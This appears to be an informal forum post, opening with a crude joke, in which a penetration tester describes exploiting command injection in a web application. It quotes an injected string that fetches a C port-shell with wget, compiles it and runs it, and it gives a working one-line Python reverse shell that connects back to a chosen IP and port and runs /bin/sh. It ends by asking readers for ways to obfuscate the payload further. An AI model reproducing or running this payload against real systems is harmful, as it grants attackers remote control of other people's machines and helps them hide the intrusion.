so the one cock says to the other...

well, I was in the middle of a penetration-test when I found a vulnerability in the systems arguments handling -- it allowed me to execute commands as the web server uid/gid.

I decided that instead of executing a: ";wget protocol://site/dir/sub-dir/portshell.c;gcc -o p portshell.c;./p" that I wanted to have the target connect to my development server, and using python at that! as some of you may know, to accomplish a reverse-shell, you have to create a socket.. dup2 the sockets fileno and execute a shell... in my case I needed to do it all on one line. This is probably not the best way to have done it, but here it goes:

sock = __import__('socket').socket(__import__('socket').AF_INET, __import__('socket').SOCK_STREAM); sock.connect((__import__('sys').argv[1], int(__import__('sys').argv[2]))); __import__('os').dup2(sock.fileno(), 0); __import__('os').dup2(sock.fileno(), 1); __import__('os').dup2(sock.fileno(), 2); __import__('os').execl('/bin/sh', '')

that is all *one* line. It's functional, to execute it you can use python -c with some modifications, or execute it on shell with 2 arguments.. first is the ip, the second is the port.

Anyone have any ideas on how I can make this better? or more sexy in obfuscation? ;)